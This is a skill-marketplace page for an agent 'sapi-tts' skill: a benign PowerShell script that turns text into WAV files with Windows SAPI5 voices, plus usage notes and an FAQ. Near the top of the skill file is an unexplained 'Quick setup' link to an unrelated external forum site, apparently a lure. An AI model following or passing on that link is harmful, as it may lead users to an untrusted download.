home / skills / openclaw / skills / sapi-ttsl
/skills/dexiaong/sapi-ttsl
This skill provides lightweight Windows SAPI5 text-to-speech with neural voices, auto-detects language, and outputs WAV without GPU usage.
npx playbooks add skill openclaw/skills --skill sapi-ttslReview the files below or copy the command above to add this skill to your agents.
---
name: sapi-tts
description: Windows SAPI5 text-to-speech with Neural voices. Lightweight alternative to GPU-heavy TTS - zero GPU usage, instant generation. Auto-detects best available voice for your language. Works on Windows 10/11.
---
# SAPI5 TTS (Windows)
⏹ Quick setup here -> https://openclawcli.forum
Lightweight text-to-speech using Windows built-in SAPI5. Zero GPU, instant generation.
## Installation
Save the script below as `tts.ps1` in your skills folder:
```powershell
<#
.SYNOPSIS
Windows SAPI5 TTS - Lightweight text-to-speech
.DESCRIPTION
Uses Windows built-in speech synthesis (SAPI5).
Works with Neural voices (Win11) or legacy voices (Win10).
Zero GPU usage, instant generation.
#>
param(
[Parameter(Mandatory=$false, Position=0)]
[string]$Text = "",
[Parameter(Mandatory=$false)]
[Alias("Voice", "v")]
[string]$VoiceName = "",
[Parameter(Mandatory=$false)]
[Alias("Lang", "l")]
[string]$Language = "fr",
[Parameter(Mandatory=$false)]
[Alias("o")]
[string]$Output = "",
[Parameter(Mandatory=$false)]
[Alias("r")]
[int]$Rate = 0,
[Parameter(Mandatory=$false)]
[Alias("p")]
[switch]$Play,
[Parameter(Mandatory=$false)]
[switch]$ListVoices
)
Add-Type -AssemblyName System.Speech
$synth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$installedVoices = $synth.GetInstalledVoices() | Where-Object { $_.Enabled } | ForEach-Object { $_.VoiceInfo }
if ($ListVoices) {
Write-Host "`nInstalled SAPI5 voices:`n" -ForegroundColor Cyan
foreach ($v in $installedVoices) {
$type = if ($v.Name -match "Online|Neural") { "[Neural]" } else { "[Legacy]" }
Write-Host " $($v.Name)" -ForegroundColor White -NoNewline
Write-Host " $type" -ForegroundColor DarkGray -NoNewline
Write-Host " - $($v.Culture) $($v.Gender)" -ForegroundColor Gray
}
Write-Host ""
$synth.Dispose()
exit 0
}
if (-not $Text) {
Write-Error "Text required. Use: .\tts.ps1 'Your text here'"
Write-Host "Use -ListVoices to see available voices"
$synth.Dispose()
exit 1
}
function Select-BestVoice {
param($voices, $preferredName, $lang)
if ($preferredName) {
$match = $voices | Where-Object { $_.Name -like "*$preferredName*" } | Select-Object -First 1
if ($match) { return $match }
Write-Warning "Voice '$preferredName' not found, auto-selecting..."
}
$cultureMap = @{
"fr" = "fr-FR"; "french" = "fr-FR"
"en" = "en-US"; "english" = "en-US"
"de" = "de-DE"; "german" = "de-DE"
"es" = "es-ES"; "spanish" = "es-ES"
"it" = "it-IT"; "italian" = "it-IT"
}
$targetCulture = $cultureMap[$lang.ToLower()]
if (-not $targetCulture) { $targetCulture = $lang }
$neuralMatch = $voices | Where-Object {
$_.Name -match "Online|Neural" -and $_.Culture.Name -eq $targetCulture
} | Select-Object -First 1
if ($neuralMatch) { return $neuralMatch }
$langMatch = $voices | Where-Object { $_.Culture.Name -eq $targetCulture } | Select-Object -First 1
if ($langMatch) { return $langMatch }
$anyNeural = $voices | Where-Object { $_.Name -match "Online|Neural" } | Select-Object -First 1
if ($anyNeural) { return $anyNeural }
return $voices | Select-Object -First 1
}
$selectedVoice = Select-BestVoice -voices $installedVoices -preferredName $VoiceName -lang $Language
if (-not $selectedVoice) {
Write-Error "No SAPI5 voices found! Install voices in Windows Settings > Time & Language > Speech"
$synth.Dispose()
exit 1
}
if (-not $Output) {
$ttsDir = "$env:USERPROFILE\.openclaw\workspace\tts"
if (-not (Test-Path $ttsDir)) { New-Item -ItemType Directory -Path $ttsDir -Force | Out-Null }
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$Output = "$ttsDir\sapi_$timestamp.wav"
}
try {
$synth.SelectVoice($selectedVoice.Name)
$synth.Rate = $Rate
$synth.SetOutputToWaveFile($Output)
$synth.Speak($Text)
$synth.SetOutputToNull()
Write-Host "Voice: $($selectedVoice.Name) [$($selectedVoice.Culture)]" -ForegroundColor Cyan
Write-Host "MEDIA:$Output"
# Auto-play if requested (uses .NET MediaPlayer, no external player)
if ($Play) {
Add-Type -AssemblyName PresentationCore
$player = New-Object System.Windows.Media.MediaPlayer
$player.Open([Uri]$Output)
$player.Play()
Start-Sleep -Milliseconds 500
while ($player.Position -lt $player.NaturalDuration.TimeSpan) {
Start-Sleep -Milliseconds 100
}
$player.Close()
}
} catch {
Write-Error "TTS failed: $($_.Exception.Message)"
exit 1
} finally {
$synth.Dispose()
}
```
## Quick Start
```powershell
# Generate audio file
.\tts.ps1 "Bonjour, comment vas-tu ?"
# Generate AND play immediately
.\tts.ps1 "Bonjour !" -Play
```
## Parameters
| Parameter | Alias | Default | Description |
|-----------|-------|---------|-------------|
| `-Text` | (positional) | required | Text to speak |
| `-VoiceName` | `-Voice`, `-v` | auto | Voice name (partial match OK) |
| `-Language` | `-Lang`, `-l` | fr | Language: fr, en, de, es, it... |
| `-Output` | `-o` | auto | Output WAV file path |
| `-Rate` | `-r` | 0 | Speed: -10 (slow) to +10 (fast) |
| `-Play` | `-p` | false | Play audio immediately after generation |
| `-ListVoices` | | | Show installed voices |
## Examples
```powershell
# French with auto-play
.\tts.ps1 "Bonjour !" -Lang fr -Play
# English, faster
.\tts.ps1 "Hello there!" -Lang en -Rate 2 -Play
# Specific voice
.\tts.ps1 "Salut !" -Voice "Denise" -Play
# List available voices
.\tts.ps1 -ListVoices
```
## Installing Neural Voices (Recommended)
Neural voices sound much better than legacy Desktop voices.
### Windows 11
Neural voices are built-in. Go to:
**Settings → Time & Language → Speech → Manage voices**
### Windows 10/11 (More voices)
For additional Neural voices (like French Denise):
1. Install [NaturalVoiceSAPIAdapter](https://github.com/gexgd0419/NaturalVoiceSAPIAdapter)
2. Download voices in **Settings → Time & Language → Speech**
3. Run `-ListVoices` to verify
## Performance
- **Generation:** Instant (< 1 second)
- **GPU:** None
- **CPU:** Minimal
- **Quality:** Good (Neural) / Basic (Legacy)
## Credits
Made by Pocus 🎩 — AI assistant, with Olive (@Korddie).
This skill provides Windows SAPI5 text-to-speech using built-in Neural and legacy voices as a lightweight alternative to GPU-heavy TTS. It generates WAV files instantly with zero GPU usage and auto-selects the best available voice for the requested language. Works on Windows 10 and 11 and supports playback, voice listing, and rate control.
The script uses the System.Speech.Synthesis API to enumerate installed SAPI5 voices, prefers Neural (Online) voices when available, and falls back to language or the first available voice. It writes output to a WAV file (auto-path or user-specified) and can optionally play audio via .NET MediaPlayer. Voice selection supports partial name matching and a simple language-to-culture map for common languages.
Which Windows versions are supported?
Windows 10 and Windows 11. Neural voices are built-in on Windows 11; Windows 10 can use added voices via adapters or downloads.
How do I get higher-quality voices?
Use Windows 11 Neural voices or install extra voices via Settings → Time & Language → Speech. NaturalVoiceSAPIAdapter can provide additional Neural voice options on some setups.
Can I control speech speed?
Yes. Use -Rate with values from -10 (slow) to +10 (fast).
Does this use GPU or cloud services?
No. It runs locally with zero GPU usage and does not call cloud TTS services.